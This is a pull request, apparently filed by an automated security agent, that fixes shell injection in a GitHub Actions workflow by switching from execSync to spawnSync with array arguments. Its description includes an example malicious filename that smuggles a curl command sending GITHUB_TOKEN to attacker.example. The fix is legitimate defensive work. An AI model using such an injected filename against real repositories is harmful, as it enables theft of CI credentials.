### PR TITLE
[sec-check] fix: prevent shell injection via filename in forensics-on-fix.yml

### DIFF
--- a/.github/workflows/forensics-on-fix.yml
+++ b/.github/workflows/forensics-on-fix.yml
@@ -124,22 +124,30 @@ jobs:
             // Run git blame on modified files (best-effort via exec)
             let blameSection = '';
             try {
-              const exec = require('child_process').execSync;
+              // Use execSync only for the merge-base lookup (merge_commit_sha is
+              // all-hex from GitHub API — safe for shell interpolation).
+              // Use spawnSync with an array for the blame lookup so that
+              // f.filename is NEVER interpreted by the shell, preventing command
+              // injection via a crafted filename in the PR.
+              const { execSync, spawnSync } = require('child_process');
               const blameEntries = [];
 
               for (const f of files.slice(0, MAX_BLAME_ENTRIES)) {
                 if (f.status === 'added' || f.status === 'removed') continue;
                 try {
-                  // Get the blame for the file at the merge base (before the fix)
-                  const mergeBase = exec(
+                  // merge_commit_sha is a hex SHA — safe to interpolate
+                  const mergeBase = execSync(
                     `git merge-base origin/main ${context.payload.pull_request.merge_commit_sha}`,
                     { encoding: 'utf8', timeout: 5000 }
                   ).trim();
 
-                  const blame = exec(
-                    `git log --oneline -1 ${mergeBase} -- "${f.filename}"`,
+                  // spawnSync with array args: f.filename is never shell-expanded
+                  const blameResult = spawnSync(
+                    'git',
+                    ['log', '--oneline', '-1', mergeBase, '--', f.filename],
                     { encoding: 'utf8', timeout: 5000 }
-                  ).trim();
+                  );
+                  const blame = blameResult.stdout ? blameResult.stdout.trim() : '';
 
                   if (blame) {
                     blameEntries.push(`- \`${f.filename}\`: last changed in ${blame}`);


### PR DESCRIPTION
## Security Fix

`forensics-on-fix.yml` used `execSync(template_string)` to run `git log`, interpolating `f.filename` (from the GitHub pulls API) directly into a shell command. Since `execSync` invokes `/bin/sh -c`, a PR author could include a file with a shell-injectable name to exfiltrate `GITHUB_TOKEN` when a maintainer merges the PR.

**Attack path:**
1. Attacker opens a PR fixing a real `kind/bug` issue
2. PR contains a file named `src/foo.ts"; curl attacker.example/?t=$(printenv GITHUB_TOKEN); echo "`
3. Maintainer reviews code and merges
4. `forensics-on-fix.yml` fires, `execSync` runs the injected command
5. `GITHUB_TOKEN` (with `issues: write`) exfiltrated before timeout

**Fix:** Replace `execSync(string)` with `spawnSync('git', [array])` — arguments are passed directly to the git process without a shell, eliminating the injection surface entirely.

Fixes #20001

---
*Filed by sec-check agent (ACMM L6 — full mode)*